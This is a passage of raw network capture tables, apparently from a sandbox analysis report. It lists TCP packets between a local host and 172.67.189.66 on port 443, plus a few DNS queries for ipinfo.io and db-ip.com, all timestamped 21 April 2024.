                                                                                                                                            Apr 21, 2024 15:31:36.290832996 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.292041063 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.292066097 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.292294979 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.293508053 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.313987970 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.314062119 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.314140081 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.314162970 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.885701895 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.885776043 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.885994911 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.885994911 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.937021971 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.937076092 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.937174082 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.937475920 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.937494040 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.157561064 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.157773018 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.158900976 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.158934116 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.159161091 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.160177946 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.160288095 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.160326958 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.193413973 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.193451881 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.563560009 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.563659906 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.563843966 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.564038038 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.564060926 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.579819918 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.579850912 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.580070972 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.580199003 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.580212116 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.797600031 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.797724962 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.798990965 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.798995972 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.799209118 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.800487041 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.800580025 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.800585032 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.177263021 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.177366972 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.177508116 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.177649975 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.177659988 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.596580029 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.596671104 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.596787930 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.597069979 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.597101927 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.815046072 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.815198898 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.816385031 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.816406012 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.816626072 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.819737911 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.820625067 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.820688963 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.824641943 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.824686050 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.828710079 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.828762054 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.832726002 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.832786083 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.835990906 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.836050987 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.836756945 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.836791992 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.836817026 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.836843967 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.837116957 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.837160110 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.837198019 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.837275982 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.837326050 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.880136013 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.880338907 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.880377054 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.880410910 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.880444050 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.880513906 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.880547047 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:40.468918085 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:40.469043016 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:40.469147921 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:40.469305038 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:40.469347000 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.198343039 CEST49774443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.198426962 CEST44349774172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.198518991 CEST49774443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.199553013 CEST49774443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.199590921 CEST44349774172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.418332100 CEST44349774172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.418416977 CEST49774443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.419845104 CEST49774443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.419872999 CEST44349774172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.420104980 CEST44349774172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.465842962 CEST49774443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.465842962 CEST49774443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.465955019 CEST44349774172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.963442087 CEST44349774172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.963505983 CEST44349774172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.963579893 CEST49774443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.963804007 CEST49774443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.963850975 CEST44349774172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.963928938 CEST49774443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.963943958 CEST44349774172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.966834068 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.966913939 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:41.967015982 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.967278957 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:41.967314959 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.183988094 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.184206963 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.185420036 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.185451984 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.185673952 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.186866045 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.186866045 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.186929941 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.731878996 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.731906891 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.731951952 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.731971025 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.731992006 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.732007027 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.732080936 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.732094049 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.732094049 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.732094049 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.732137918 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.732178926 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.732196093 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.732198954 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.732204914 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.732234955 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.732686996 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.732739925 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.732748032 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.732762098 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.732810020 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.732954025 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.732969999 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.732985020 CEST49775443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.732990980 CEST44349775172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.755670071 CEST49776443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.755711079 CEST44349776172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.755798101 CEST49776443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.756247997 CEST49776443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.756263971 CEST44349776172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.974857092 CEST44349776172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.974946022 CEST49776443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.976061106 CEST49776443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.976069927 CEST44349776172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.976301908 CEST44349776172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.977286100 CEST49776443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.977427006 CEST49776443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.977458954 CEST44349776172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:42.977519989 CEST49776443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:42.977530003 CEST44349776172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:43.520678043 CEST44349776172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:43.520766020 CEST44349776172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:43.520832062 CEST49776443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:43.521058083 CEST49776443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:43.521079063 CEST44349776172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:43.540682077 CEST49777443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:43.540776968 CEST44349777172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:43.540884972 CEST49777443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:43.541137934 CEST49777443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:43.541157961 CEST44349777172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:43.760598898 CEST44349777172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:43.760797024 CEST49777443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:43.761818886 CEST49777443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:43.761847019 CEST44349777172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:43.762068987 CEST44349777172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:43.763113022 CEST49777443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:43.763226986 CEST49777443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:43.763263941 CEST44349777172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.284857988 CEST44349777172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.284984112 CEST44349777172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.285064936 CEST49777443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.285065889 CEST49777443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.322886944 CEST49778443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.322967052 CEST44349778172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.323246956 CEST49778443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.323393106 CEST49778443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.323415995 CEST44349778172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.543528080 CEST44349778172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.543646097 CEST49778443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.544842958 CEST49778443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.544863939 CEST44349778172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.545275927 CEST44349778172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.546365976 CEST49778443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.546500921 CEST49778443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.546546936 CEST44349778172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.546629906 CEST49778443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.546644926 CEST44349778172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.584049940 CEST49777443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.584079981 CEST44349777172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.985836983 CEST44349778172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.985971928 CEST44349778172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:44.986145020 CEST49778443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.986218929 CEST49778443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:44.986258030 CEST44349778172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.037807941 CEST49779443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.037861109 CEST44349779172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.037929058 CEST49779443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.038330078 CEST49779443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.038340092 CEST44349779172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.258126020 CEST44349779172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.258236885 CEST49779443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.267136097 CEST49779443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.267160892 CEST44349779172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.267559052 CEST44349779172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.268747091 CEST49779443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.268868923 CEST49779443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.268893957 CEST44349779172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.657916069 CEST44349779172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.658068895 CEST44349779172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.658235073 CEST49779443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.659333944 CEST49779443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.659348011 CEST44349779172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.672919035 CEST49780443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.673007011 CEST44349780172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.673147917 CEST49780443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.673425913 CEST49780443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.673475027 CEST44349780172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.893929958 CEST44349780172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.894119024 CEST49780443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.895256042 CEST49780443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.895265102 CEST44349780172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.895603895 CEST44349780172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:45.896857023 CEST49780443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.896935940 CEST49780443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:45.896944046 CEST44349780172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:46.406929970 CEST44349780172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:46.407052040 CEST44349780172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:46.407116890 CEST49780443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:46.407221079 CEST49780443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:46.407282114 CEST44349780172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:46.835844040 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:46.835947037 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:46.836067915 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:46.836354971 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:46.836391926 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.058368921 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.058613062 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.059763908 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.059782982 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.060132980 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.061326981 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.062066078 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.062114954 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.062226057 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.062277079 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.062411070 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.062448978 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.062611103 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.062655926 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.062835932 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.062884092 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.063066959 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.063106060 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.063131094 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.063155890 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.063270092 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.063304901 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.063339949 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.063427925 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.063468933 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.108118057 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.108494997 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.108572960 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.108627081 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.156136990 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.156757116 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.204138041 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:48.651071072 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:48.651134014 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:48.651206017 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:48.651386023 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:48.651431084 CEST44349781172.67.189.66192.168.2.4

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Apr 21, 2024 15:31:11.948151112 CEST5740753192.168.2.41.1.1.1
                                                                                                                                            Apr 21, 2024 15:31:12.054332972 CEST53574071.1.1.1192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:12.604170084 CEST6545853192.168.2.41.1.1.1
                                                                                                                                            Apr 21, 2024 15:31:12.710485935 CEST53654581.1.1.1192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:20.586831093 CEST5209353192.168.2.41.1.1.1
                                                                                                                                            Apr 21, 2024 15:31:20.719496965 CEST53520931.1.1.1192.168.2.4

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Apr 21, 2024 15:31:11.948151112 CEST192.168.2.41.1.1.10x82faStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                            Apr 21, 2024 15:31:12.604170084 CEST192.168.2.41.1.1.10xca8dStandard query (0)db-ip.comA (IP address)IN (0x0001)false
